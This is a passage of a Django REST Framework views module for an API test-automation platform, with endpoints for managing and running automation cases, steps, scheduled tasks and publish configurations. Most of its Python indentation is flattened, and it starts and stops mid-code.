obis = Automation.objects.filter(Q(name__contains=name)|Q(publish__contains="'%s'" % name),project=project_id,group=group_id, type=type).exclude(id__in=exclude).order_by("-id")
elif name:
obis = Automation.objects.filter(Q(name__contains=name)|Q(publish__contains="'%s'" % name),project=project_id,group=group_id).exclude(id__in=exclude).order_by("-id")
elif type:
obis = Automation.objects.filter(project=project_id, type=type,group=group_id).exclude(id__in=exclude).order_by("-id")
else:
obis = Automation.objects.filter(project=project_id,group=group_id).exclude(id__in=exclude).order_by("-id")
else:
if name and type:
obis = Automation.objects.filter(Q(name__contains=name)|Q(group__name=name)|Q(publish__contains="'%s'" % name),project=project_id, type=type).exclude(id__in=exclude).order_by("-id")
elif name:
obis = Automation.objects.filter(Q(name__contains=name)|Q(group__name=name)|Q(publish__contains="'%s'" % name),project=project_id).exclude(id__in=exclude).order_by("-id")
elif type:
obis = Automation.objects.filter(project=project_id, type=type).exclude(id__in=exclude).order_by("-id")
else:
obis = Automation.objects.filter(project=project_id).exclude(id__in=exclude).order_by("-id")
        paginator = Paginator(obis, page_size)  # paginator object
        pages = paginator.num_pages  # total number of pages
total = len(obis)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationListSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"page_size":page_size,
"total": total
}, code="999999", msg="成功!")
class AddAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id and group_id are ints
if not data["project_id"] or not data["name"] or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("add_automation")
def post(self, request):
"""
        Add a test case.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
data["user"]=request.user.pk
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(project)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
name = Automation.objects.filter(name=data["name"], project=data["project_id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
with transaction.atomic():
try:
serialize = AutomationDeserializer(data=data)
if serialize.is_valid():
try:
group = Group.objects.get(id=data["group_id"], project=data["project_id"])
serialize.save(project=project, group=group, user=request.user)
if data["copyId"]:
if data["type"] in ("case","reuse","data"):
steps=Automation.objects.get(id=data["copyId"]).steps.all().order_by("automation2step__order")
for i, step in enumerate(steps):
if step.type=="normal":
step.id=None
step.save()
Automation2Step.objects.create(order=i+1,automation_id=serialize.data.get("id"),step=step)
elif data["type"]=="list":
automations=AutomationList2Automation.objects.filter(automationParent_id=data["copyId"],status=True).order_by("order")
for i, automation in enumerate(automations):
AutomationList2Automation.objects.create(order=i+1,automationParent_id=serialize.data.get("id"),automationStep=automation.automationStep)
elif data["type"]=="monitor":
apis=Automation.objects.get(id=data["copyId"]).apis.all()
automation=Automation.objects.get(id=serialize.data.get("id"))
for i, api in enumerate(apis):
automation.apis.add(api)
except KeyError:
serialize.save(project=project, user=request.user)
record_dynamic(project=data["project_id"],
_type="新增", operationObject="自动化", user=request.user.pk,
data="新增自动化\"%s\"" % data["name"])
return JsonResponse(data={"automation_id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
                except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id, id and group_id are ints
if not data["project_id"] or not data["name"] or not data["id"] \
or not data["group_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int) \
or not isinstance(data["group_id"], int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
        Update an automation.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
try:
automation = Automation.objects.get(id=data["id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化用例不存在!")
try:
Group.objects.get(id=data["group_id"], project=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999991", msg="分组不存在!")
name = Automation.objects.filter(name=data["name"], project=data["project_id"]).exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
try:
serialize = AutomationDeserializer(data=data)
if serialize.is_valid():
data["user_id"] = request.user.pk
serialize.update(instance=automation, validated_data=data)
if "orders" in data:
orders=data["orders"]
for index,id in enumerate(orders):
if automation.type in ("case","reuse"):
Automation2Step.objects.filter(id=id).update(order=index+1)
                            elif automation.type == "list":
AutomationList2Automation.objects.filter(id=id).update(order=index+1)
record_dynamic(project=data["project_id"],
_type="修改", operationObject="自动化", user=request.user.pk, data="修改自动化\"%s\"" % data["name"])
return JsonResponse(code="999999", msg="成功!")
return JsonResponse(code="999998", msg="失败!")
            except Exception:
                logging.error(traceback.format_exc())
                return JsonResponse(code="999998", msg="失败!")
class DelAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that project_id is an int and ids is a list of ints
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("delete_automation")
def post(self, request):
"""
        Delete test cases.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
for j in data["ids"]:
with transaction.atomic():
obi = Automation.objects.filter(id=j, project=data['project_id'])
if len(obi) != 0:
name = obi[0].name
if obi[0].type in ("case","reuse","data"):
steps=obi[0].steps.all()
for step in steps:
if step.type=="normal":
step.delete()
obi.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="自动化", user=request.user.pk, data="删除自动化\"%s\"" % name)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999999", msg="成功!")
class StepList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the list of case steps.
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 1000))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
if request.GET.get("automation_id"):
automation_id = request.GET.get("automation_id")
if not automation_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
automation=Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化不存在!")
if automation.type in ("case","reuse","data"):
steps=Automation2Step.objects.filter(automation=automation).order_by("order")
# steps=automation.steps.all().order_by("automation2step__order")
steps=Automation2StepSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,step=None).order_by("-id")[:10].values("trace","result","testTime")
elif automation.type=="list":
steps=AutomationList2Automation.objects.filter(automationParent=automation).order_by("order")
steps=AutomationList2AutomationSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,step=None).order_by("-id")[:10].values("trace","result","testTime")
elif automation.type=="monitor":
steps=automation.apis.all().order_by("id")
steps=ApiInfoSerializer(steps, many=True).data
results=AutomationResult.objects.filter(automation=automation_id,api=None).order_by("-id")[:10].values("trace","result","testTime")
# step = AutomationStep.objects.filter(automation=automation_id).order_by("id")
return JsonResponse(data={"steps": steps,
"automation": AutomationSerializer(automation).data,
"results":results,
}, code="999999", msg="成功!")
else:
project_id = int(request.GET.get("project_id"))
# automation_id = int(request.GET.get("automation_id"))
steps = AutomationStep.objects.filter(Q(type="project",project=project_id)|Q(type="global")).order_by("id")
            paginator = Paginator(steps, page_size)  # paginator object
            pages = paginator.num_pages  # total number of pages
total = len(steps)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationStepSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class StepInfo(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get detailed step info.
:param request:
:return:
"""
automation_id = request.GET.get("automation_id")
step_id = request.GET.get("step_id")
if not automation_id.isdecimal() or not step_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="用例不存在!")
try:
obm = AutomationStep.objects.get(id=step_id)
except ObjectDoesNotExist:
return JsonResponse(code="999990", msg="步骤不存在!")
data = AutomationStepSerializer(obm).data
return JsonResponse(data=data, code="999999", msg="成功!")
class AddStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
if not data["name"] or not data["type"] or not data["steps"] or not data["order"]:
return JsonResponse(code="999996", msg="参数有误!")
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if data["type"] not in ["normal","project","global"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
        Add a case step.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
data["user"] = request.user.pk
if result:
return result
with transaction.atomic():
try:
project=Project.objects.get(id=data["project_id"])
automation = Automation.objects.get(id=data["automation_id"])
step=AutomationStep.objects.create(name=data["name"],type=data["type"],steps=data["steps"],
params=data["params"],description=data["description"],
project=project,automation=automation)
Automation2Step.objects.create(order=data["order"],automation=automation,step=step)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(data={"step_id": step.id},code="999999", msg="成功!")
class StepStatusUpdate(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Update the status of a case step.
:param request:
:return:
"""
data = request.data
with transaction.atomic():
try:
if data["type"] in ("case","reuse","data"):
AutomationList2Automation.objects.filter(id=data["id"]).update(status=data["status"])
else:
Automation2Step.objects.filter(id=data["id"]).update(status=data["status"])
return JsonResponse(code="999999", msg="成功!")
            except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that the required fields are present and id is an int
if not data["name"] or not data["type"] or not data["steps"] or not data["order"] or not data["id"] or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
if data["type"] not in ["normal","project","global"]:
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
        Update a case step.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
# try:
# step = AutomationStep.objects.get(id=data["id"])
# except ObjectDoesNotExist:
# return JsonResponse(code="999990", msg="步骤不存在!")
if data["type"]=="project":
name = AutomationStep.objects.filter(name=data["name"], project=data["project_id"],type="project").exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
if data["type"]=="global":
name = AutomationStep.objects.filter(name=data["name"], type="global").exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
with transaction.atomic():
try:
AutomationStep.objects.filter(id=data["id"]).update(name=data["name"],type=data["type"],steps=str(data["steps"]),
params=data["params"],description=data["description"])
return JsonResponse(code="999999", msg="成功!")
            except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def parameter_check(self, data):
"""
        Validate parameters.
:param data:
:return:
"""
try:
            # Check that ids is a non-empty list
if not data["ids"] or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
except KeyError:
return JsonResponse(code="999996", msg="参数有误!")
@permission_required("change_automation")
def post(self, request):
"""
        Delete case steps.
:param request:
:return:
"""
data = request.data
result = self.parameter_check(data)
if result:
return result
automation=Automation.objects.get(id=data["automation_id"])
for item in data["ids"]:
step=AutomationStep.objects.get(id=item["id"])
if step is not None:
# automation.steps.remove(step)
Automation2Step.objects.filter(automation=automation,step=step,order=item["order"]).delete()
if step.type=="normal":
step.delete()
steps=Automation2Step.objects.filter(automation=automation).order_by("order")
order=0
for step in steps:
order+=1
step.order=order
# step.update(order=order)
step.save()
return JsonResponse(code="999999", msg="成功!")
class AddReuseStep(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Add reusable case steps.
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
order=len(automation.steps.all())
for id in data["ids"]:
order=order+1
step = AutomationStep.objects.get(id=id)
Automation2Step.objects.create(order=order,automation=automation,step=step)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class LinkApi(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Link APIs to an automation.
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
for id in data["ids"]:
api = ApiInfo.objects.get(id=id)
automation.apis.add(api)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class UnlinkApi(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Unlink APIs from an automation.
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automation = Automation.objects.get(id=data["automation_id"])
for id in data["ids"]:
api = ApiInfo.objects.get(id=id)
automation.apis.remove(api)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class LinkAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Link automations.
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automationParent = Automation.objects.get(id=data["automation_id"])
order=len(automationParent.automations.all())
for id in data["ids"]:
order=order+1
automationStep = Automation.objects.get(id=id)
AutomationList2Automation.objects.create(order=order,automationParent=automationParent,automationStep=automationStep)
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class UnlinkAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_automation")
def post(self, request):
"""
        Unlink automations.
:param request:
:return:
"""
data = request.data
if not data["automation_id"] or not data["project_id"]:
return JsonResponse(code="999996", msg="参数有误!")
with transaction.atomic():
try:
automationParent = Automation.objects.get(id=data["automation_id"])
# order=len(automationParent.automations.all())
for id in data["ids"]:
# order=order+1
automationStep = Automation.objects.get(id=id)
AutomationList2Automation.objects.filter(automationParent=automationParent,automationStep=automationStep).delete()
except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999996", msg="参数有误!")
return JsonResponse(code="999999", msg="成功!")
class RunAutomation(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def post(self, request):
"""
        Run test cases.
:param request:
:return:
"""
data = request.data
try:
logging.info("Run automation with data: {data}".format(data=json.dumps(data)))
trace=datetime.now().strftime('%Y%m%d%H%M%S%f')
paramMap={}
envMap={}
ids=data["ids"] if "ids" in data else None
result={}
if "automation_id" in data:
automation = Automation.objects.get(id=data["automation_id"])
projectId=automation.project.id
if json.is_json(data["env"]):
envMap=json.loads(data["env"])
else:
env="集成" if data["env"]==1 else "预发布" if data["env"]==2 else "线上" if data["env"]==3 else data["env"]
obi = ProjectConfig.objects.filter(project=projectId,name=env,type="env").order_by("-id")
if len(obi)>0:
envMap=json.loads(obi[0].value)
context={"project":projectId,"ids":ids,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":envMap["env"] if "env" in envMap else "","envMap":envMap,"user": request.user.pk if request.user.pk else 1}
context["debug"]=True
if "params" in data:
paramMap=json.loads(data["params"])
if "data" in data and len(data["data"])>0:
obis = ProjectConfig.objects.filter(project=projectId,name__in=data["data"],type="data")
for obi in obis:
paramMap=ParamUtil.replaceMap(paramMap,json.loads(obi.value))
context["value"]=paramMap
if automation.type=="list":
thread=RunService.run_automationlist(automation,context)
result=thread.result
else:
thread=RunService.run_automation(automation,context)
result=thread.result
record_dynamic(project=projectId,_type="执行", operationObject="自动化用例", user=request.user.pk,data="执行自动化用例[%s]" % automation.name)
elif "publish" in data:
env="集成" if data["env"]==1 else "预发布" if data["env"]==2 else "线上" if data["env"]==3 else data["env"]
publish = PublishConfig.objects.filter(name=data["publish"],env=env,status=True)
if len(publish)==0:
return JsonResponse(data={}, code="999990", msg="没有满足条件的发布项目配置!")
publish=publish[0]
projectId=publish.project.id
obi = ProjectConfig.objects.filter(project=projectId,name=env,type="env").order_by("-id")
if len(obi)>0:
envMap=json.loads(obi[0].value)
context={"project":projectId,"ids":ids,"result":{},"details":[],"status":"RUNNING","trace":trace,"env":envMap["env"] if "env" in envMap else "","envMap":envMap,"user": request.user.pk if request.user.pk else 1}
publishId=data["id"] if "id" in data else None
paramMap=json.loads(publish.params)
context["value"]=paramMap
result=PublishService.run_test(publish,publishId,context)
except Exception as e:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="执行失败! 异常信息: %s" % str(e))
return JsonResponse(data=result, code="999999", msg="成功!")
class ResultList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get case execution results.
:param request:
:return:
"""
if request.GET.get("automation_id"):
automation_id = request.GET.get("automation_id")
trace=request.GET.get("trace")
if not automation_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
automation=Automation.objects.get(id=automation_id)
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化不存在!")
automation_result=RunService.getAutomationResult(automation,trace)
return JsonResponse(data=automation_result, code="999999", msg="成功!")
else:
trace=request.GET.get("trace")
automation_result=RunService.getPublishResult(trace)
return JsonResponse(data=automation_result, code="999999", msg="成功!")
class CommandList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the command list.
:param request:
:return:
"""
commands=CommandService.get_all_commands()
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
apis = ApiInfo.objects.filter(project=project_id).order_by("-id")
for apiInfo in apis:
command={"name":apiInfo.name,"type":"api","desc":apiInfo.description,"alias":apiInfo.name,"value":apiInfo.params,"actionId":apiInfo.id}
commands.append(command)
automations = Automation.objects.filter(project=project_id,type="reuse").exclude(id=automation_id).order_by("-id")
for automation in automations:
command={"name":automation.name,"type":"automation","desc":automation.description,"alias":automation.name,"value":automation.params,"actionId":automation.id}
commands.append(command)
return JsonResponse(data={"data": commands}, code="999999", msg="成功!")
class TaskList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the automation task list.
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 20))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
project_id = request.GET.get("project_id")
automation_id = request.GET.get("automation_id")
name = request.GET.get("name")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if automation_id:
if name:
tasks=AutomationTask.objects.filter(project=project_id, automation=automation_id,name__contains=name).order_by("-id")
else:
tasks=AutomationTask.objects.filter(project=project_id, automation=automation_id).order_by("-id")
else:
if name:
tasks=AutomationTask.objects.filter(project=project_id, name__contains=name).order_by("-id")
else:
tasks=AutomationTask.objects.filter(project=project_id).order_by("-id")
        paginator = Paginator(tasks, page_size)  # paginator object
        pages = paginator.num_pages  # total number of pages
total = len(tasks)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = AutomationTaskSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class AddTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("add_task")
def post(self, request):
"""
        Add a task.
:param request:
:return:
"""
data = request.data
data["user"] = request.user.pk
name = AutomationTask.objects.filter(name=data["name"], project=data["project_id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
with transaction.atomic():
try:
serialize = AutomationTaskDeserializer(data=data)
if serialize.is_valid():
try:
project = Project.objects.get(id=data["project_id"])
serialize.save(project=project)
task=AutomationTask.objects.get(id=serialize.data.get("id"))
if data["status"]:
TaskService.start_task(task)
except Exception as e:
logging.exception(e)
traceback.print_exc()
return JsonResponse(code="999998", msg="失败!")
record_dynamic(project=data["project_id"],
_type="新增", operationObject="自动化任务", user=request.user.pk,
data="新增自动化任务\"%s\"" % data["name"])
return JsonResponse(data={"task_id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
                except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdateTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Update an automation task.
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["name"] or not data["id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
try:
task = AutomationTask.objects.get(id=data["id"])
except ObjectDoesNotExist:
return JsonResponse(code="999987", msg="自动化任务不存在!")
name = AutomationTask.objects.filter(name=data["name"], project=data["project_id"]).exclude(id=data["id"])
if len(name):
return JsonResponse(code="999997", msg="存在相同名称!")
else:
try:
serialize = AutomationTaskDeserializer(data=data)
if serialize.is_valid():
serialize.update(instance=task,validated_data=data)
# serialize.save()
if data["status"]:
TaskService.start_task(task)
else:
TaskService.stop_task(task)
return JsonResponse(code="999999", msg="成功!")
            except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class DelTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("delete_task")
def post(self, request):
"""
        Delete tasks.
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["ids"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["ids"], list):
return JsonResponse(code="999996", msg="参数有误!")
for i in data["ids"]:
if not isinstance(i, int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
for j in data["ids"]:
task = AutomationTask.objects.filter(id=j, project=data['project_id'])
if len(task) != 0:
name = task[0].name
TaskService.stop_task(task[0])
task.delete()
record_dynamic(project=data["project_id"],
_type="删除", operationObject="自动化任务", user=request.user.pk, data="删除自动化任务\"%s\"" % name)
return JsonResponse(code="999999", msg="成功!")
class StopTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Stop a task.
:param request:
:return:
"""
data = request.data
        # Check that the task exists
try:
task = AutomationTask.objects.get(id=data["id"])
task.status = False
task.save()
TaskService.stop_task(task)
record_dynamic(project=data["project_id"],
_type="禁用", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="任务不存在!")
class StartTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Start a task.
:param request:
:return:
"""
data = request.data
        # Check that the task exists
try:
task = AutomationTask.objects.get(id=data["id"])
task.status = True
task.save()
TaskService.start_task(task)
record_dynamic(project=data["project_id"],
_type="启用", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="任务不存在!")
class RunTask(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
# @permission_required("run_task")
def post(self, request):
"""
        Run a task.
:param request:
:return:
"""
data = request.data
        # Check that the task exists
try:
task = AutomationTask.objects.get(id=data["id"])
task.sendEmail=data["sendEmail"]
task.emails=data["emails"]
context={"project":task.project.id,"result":{},"details":[],"status":"RUNNING","user": request.user.pk if request.user.pk else 1}
TaskService.run_task(task,context)
record_dynamic(project=data["project_id"],
_type="执行", operationObject="任务", user=request.user.pk, data=task.name)
return JsonResponse(code="999999", msg="成功")
        except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999995", msg="失败!")
class PublishConfigList(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
def get(self, request):
"""
        Get the publish config list.
:param request:
:return:
"""
try:
page_size = int(request.GET.get("page_size", 20))
page = int(request.GET.get("page", 1))
except (TypeError, ValueError):
return JsonResponse(code="999985", msg="page and page_size must be integer!")
project_id = request.GET.get("project_id")
name = request.GET.get("name")
if not project_id:
return JsonResponse(code="999996", msg="参数有误!")
if not project_id.isdecimal():
return JsonResponse(code="999996", msg="参数有误!")
try:
pro_data = Project.objects.get(id=project_id)
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
pro_data = ProjectSerializer(pro_data)
if not pro_data.data["status"]:
return JsonResponse(code="999985", msg="该项目已禁用")
if name:
publishs=PublishConfig.objects.filter(project=project_id, name__contains=name).order_by("-id")
else:
publishs=PublishConfig.objects.filter(project=project_id).order_by("-id")
        paginator = Paginator(publishs, page_size)  # paginator object
        pages = paginator.num_pages  # total number of pages
total = len(publishs)
try:
obm = paginator.page(page)
except PageNotAnInteger:
obm = paginator.page(1)
except EmptyPage:
obm = paginator.page(paginator.num_pages)
serialize = PublishConfigSerializer(obm, many=True)
return JsonResponse(data={"data": serialize.data,
"page": page,
"pages": pages,
"total": total
}, code="999999", msg="成功!")
class AddPublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("add_task")
def post(self, request):
"""
        Add a publish config.
:param request:
:return:
"""
data = request.data
data["user"] = request.user.pk
with transaction.atomic():
try:
serialize = PublishConfigDeserializer(data=data)
if serialize.is_valid():
project = Project.objects.get(id=data["project_id"])
serialize.save(project=project)
record_dynamic(project=data["project_id"],
_type="新增", operationObject="发布项目配置", user=request.user.pk,
data="新增发布项目配置:\"%s\",测试环境:\"%s\"" % (data["name"],data["env"]))
return JsonResponse(data={"id": serialize.data.get("id")},
code="999999", msg="成功!")
return JsonResponse(code="999996", msg="参数有误!")
            except Exception:
logging.error(traceback.format_exc())
return JsonResponse(code="999998", msg="失败!")
class UpdatePublishConfig(APIView):
authentication_classes = (TokenAuthentication,)
permission_classes = ()
@permission_required("change_task")
def post(self, request):
"""
        Update a publish config.
:param request:
:return:
"""
data = request.data
if not data["project_id"] or not data["name"] or not data["id"]:
return JsonResponse(code="999996", msg="参数有误!")
if not isinstance(data["project_id"], int) or not isinstance(data["id"], int):
return JsonResponse(code="999996", msg="参数有误!")
try:
project = Project.objects.get(id=data["project_id"])
except ObjectDoesNotExist:
return JsonResponse(code="999995", msg="项目不存在!")
project = ProjectSerializer(project)
if not project.data["status"]:
